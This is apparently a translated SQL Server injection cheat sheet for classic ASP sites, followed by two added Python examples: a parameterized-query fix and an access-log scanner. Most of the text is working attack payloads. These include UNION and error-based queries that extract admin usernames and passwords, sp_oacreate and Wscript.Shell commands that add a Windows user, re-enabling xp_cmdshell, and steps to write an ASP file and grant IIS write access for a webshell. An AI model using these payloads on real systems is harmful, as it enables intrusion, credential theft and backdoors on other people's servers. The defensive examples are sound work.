Some of the most important user names and roles (present in a default SQL Server database):
public
dbo
guest (generally disabled or not authorized)
db_securityadmin
db_ddladmin
Some default extended stored procedures:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia - drive related
xp_dirtree - directory tree
xp_enumdsn - ODBC connections
xp_loginconfig - server security mode information
xp_makecab - create a compressed (cab) archive
xp_ntsec_enumdomains - domain information
xp_terminate_process - terminate a process, given its PID
For example:
sp_addextendedproc 'xp_webserver', 'C:\temp\xp_foo.dll'
EXEC xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "SELECT * FROM Test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
' GROUP BY Users.id HAVING 1=1--
' GROUP BY Users.id, Users.username, Users.password, Users.privs HAVING 1=1--
'; INSERT INTO users VALUES (666, 'attacker', 'foobar', 0xFFFF)--
UNION SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='logintable'--
UNION SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='logintable' AND column_name NOT IN ('login_id')--
UNION SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='logintable' AND column_name NOT IN ('login_id', 'login_name')--
UNION SELECT TOP 1 login_name FROM logintable--
UNION SELECT TOP 1 password FROM logintable WHERE login_name='Rahul'--
Constructed statements: checking whether xp_cmdshell exists
' UNION SELECT @@version,1,1,1--
and 1=(SELECT @@VERSION)
and 'sa'=(SELECT system_user)
' UNION SELECT ret,1,1,1 FROM foo--
' UNION SELECT MIN(username),1,1,1 FROM users WHERE username>'a'--
' UNION SELECT MIN(username),1,1,1 FROM users WHERE username>'admin'--
' UNION SELECT password,1,1,1 FROM users WHERE username='admin'--
and user_name()='dbo'
and 0<>(SELECT user_name())--
; DECLARE @shell INT exec sp_oacreate 'Wscript.Shell', @shell OUTPUT exec sp_oamethod @shell, 'run', NULL, 'C:\WINNT\system32\cmd.exe /c net user swap 5245886 /add'
and 1=(SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell')
; EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(SELECT is_srvrolemember('sysadmin')) - determines whether the current login has the sysadmin (sa) role
and 0<>(SELECT TOP 1 paths FROM newtable)-- database-dumping method
and 1=(SELECT name FROM master.dbo.sysdatabases WHERE dbid=7) - obtains the database name (dbids 1 to 5 are system databases; 6 and above can be probed)
Create a virtual directory for the E drive:
DECLARE @o int exec sp_oacreate 'Wscript.Shell', @o out exec sp_OAMethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "E" "E:\"'
Set access properties (so that a webshell can be written):
DECLARE @o int exec sp_oacreate 'Wscript.Shell', @o out exec sp_OAMethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'
and 0<>(SELECT COUNT(*) FROM master.dbo.sysdatabases WHERE name>1 AND dbid=6)
Submit dbid=7, 8, 9, ... in turn to get more database names.
and 0<>(SELECT TOP 1 name FROM bbs.dbo.sysobjects WHERE xtype='U') - enumerates a table, assumed here to be admin
and 0<>(SELECT TOP 1 name FROM bbs.dbo.sysobjects WHERE xtype='U' AND name NOT IN ('admin')) - gets the other tables
and 0<>(SELECT COUNT(*) FROM bbs.dbo.sysobjects WHERE xtype='U' AND name='admin' AND uid>(str(id))) - brute-forces the object id of admin through uid; assume the id is 18779569 (uid=id)
and 0<>(SELECT TOP 1 name FROM bbs.dbo.syscolumns WHERE id=18779569) - gets a field of admin, assumed to be user_id
and 0<>(SELECT TOP 1 name FROM bbs.dbo.syscolumns WHERE id=18779569 AND name NOT IN ('id', ...)) - enumerates the other fields
and 0<(SELECT user_id FROM bbs.dbo.admin WHERE username>1)
From here the user name, and then the password, can be obtained. Assume there are fields such as user_id, username, password, etc.
Show.asp?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,* FROM admin
Show.asp?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,*,9,10,11,12,13 FROM admin
(UNION statements are usable almost everywhere, and work well against Access too.)
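The two Show.asp lines above work only because the id parameter is pasted straight into the SQL text. As an added example (not code from the original page), the following Python uses an in-memory SQLite table, a stand-in for the MSSQL/ASP setup the page assumes, to show the vulnerable concatenation beside the hardened form: the hardened version type-checks the id as an integer and binds it with a placeholder, so the "-1 UNION SELECT ... FROM admin" input is rejected before it reaches the database. The table names, columns and rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample schema: a public 'news' table and a sensitive 'admin' table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (user_id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'hello'), (2, 'world');
        INSERT INTO admin VALUES (1, 'admin', 'placeholder-secret');
        """
    )
    return conn


def show_vulnerable(conn, raw_id):
    """Mirrors the string concatenation behind Show.asp?id=...

    Whatever the client sends becomes part of the SQL text, so an id of
    "-1 UNION SELECT username, password FROM admin" is executed as SQL and the
    admin row comes back in place of a news row.
    """
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def show_hardened(conn, raw_id):
    """Validate the type first, then bind the value with a placeholder.

    The id is an integer by contract, so anything that does not parse as one is
    refused before any SQL is built; the placeholder keeps the value out of the
    query text entirely, so no quoting trick can change the statement's shape.
    """
    try:
        id_value = int(raw_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return conn.execute("SELECT id, title FROM news WHERE id=?", (id_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    injected = "-1 UNION SELECT username, password FROM admin"
    print("vulnerable:", show_vulnerable(db, injected))
    print("hardened, normal id:", show_hardened(db, "2"))
    try:
        show_hardened(db, injected)
    except ValueError as exc:
        print("hardened, injected id rejected:", exc)
```

The same two-step rule (validate the type, then bind) is what a parameterized ADO command or a stored procedure with typed parameters gives you on SQL Server; concatenation into the query string, as in the ASP pattern the page targets, is the defect.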
Special tip for database dumping: %5c = ' or '/and ' (modify %5 and submit)
and 0<>(SELECT COUNT(*) FROM master.dbo.sysdatabases WHERE name>1 AND dbid=6)
and 0<>(SELECT TOP 1 name FROM bbs.dbo.sysobjects WHERE xtype='U') - gets the table name
and 0<>(SELECT TOP 1 name FROM bbs.dbo.sysobjects WHERE xtype='U' AND name NOT IN ('address'))
and 0<>(SELECT COUNT(*) FROM bbs.dbo.sysobjects WHERE xtype='U' AND name='admin' AND uid>(str(id))) - determines the id value
and 0<>(SELECT TOP 1 name FROM bbs.dbo.syscolumns WHERE id=773577794) - lists all fields
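Every probe on this page leaves a recognizable trace in the web server log: a UNION SELECT, a reference to sysobjects/syscolumns/sysdatabases or INFORMATION_SCHEMA, an xp_ or sp_oa* procedure name, or a fingerprint such as @@version or is_srvrolemember, often URL-encoded as in the %20 example above. As an added example (not code from the original page), this Python scanner URL-decodes the query string of each request in a handful of constructed access-log lines and tags the ones that carry those markers, which is the minimum a defender wants from log review or a WAF rule set for a classic ASP + SQL Server application. The log lines, IP addresses and paths are constructed for the example; the pattern list is derived from the probes listed on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache/IIS-style), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /show.asp?id=17 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /show.asp?id=-1%20Union%20select%201,2,3,*%20from%20admin HTTP/1.1" 200 812',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /show.asp?id=1%20and%201=(select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=%27x%27%20and%20name=%27xp_cmdshell%27) HTTP/1.1" 500 311',
    '10.0.0.9 - - [12/Mar/2024:10:01:15 +0000] "GET /show.asp?id=1;DECLARE%20@o%20int%20exec%20sp_oacreate%20%27Wscript.Shell%27,@o%20out HTTP/1.1" 500 311',
    '10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "GET /search.asp?q=union+station HTTP/1.1" 200 2048',
]

# Markers taken from the probes on this page, grouped by what the attacker is doing.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "catalog_probe": re.compile(
        r"\b(sysobjects|syscolumns|sysdatabases|information_schema\.columns)\b", re.I
    ),
    "xp_procs": re.compile(
        r"\bxp_(cmdshell|reg\w+|dirtree|availablemedia|enumdsn|loginconfig|"
        r"makecab|ntsec_enumdomains|terminate_process)\b",
        re.I,
    ),
    "ole_automation": re.compile(
        r"\bsp_(oacreate|oamethod|addextendedproc|dropextendedproc)\b", re.I
    ),
    "server_fingerprint": re.compile(
        r"@@version|\bis_srvrolemember\b|\bsystem_user\b|\buser_name\s*\(", re.I
    ),
}

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def normalize(query_string):
    """URL-decode twice (catches %2527-style double encoding) and collapse whitespace.

    Decoding twice can mangle a legitimate literal '%' in input; for a detector
    that is an acceptable trade, since the goal is to miss fewer probes.
    """
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded)


def classify(line):
    """Return the list of pattern names that match the request's query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    _, _, query_string = match.group(1).partition("?")
    text = normalize(query_string)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]


def scan(lines):
    """Return (client_ip, [tags]) for every line that carries at least one marker."""
    hits = []
    for line in lines:
        tags = classify(line)
        if tags:
            hits.append((line.split()[0], tags))
    return hits


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG):
        print(ip, ",".join(tags))
```

The word-boundary requirement on "union ... select" keeps an innocent search for "union station" out of the results, while the sysobjects and xp_cmdshell probe from the %20-encoded line on this page is tagged twice (catalog probe plus extended procedure), which is the combination worth paging on: it is the exact sequence that precedes an attempt to re-add xp_cmdshell or fall back to sp_oacreate. In production, feed the decoded query string from your real log format into classify() and alert on any hit from a source that also triggers HTTP 500s.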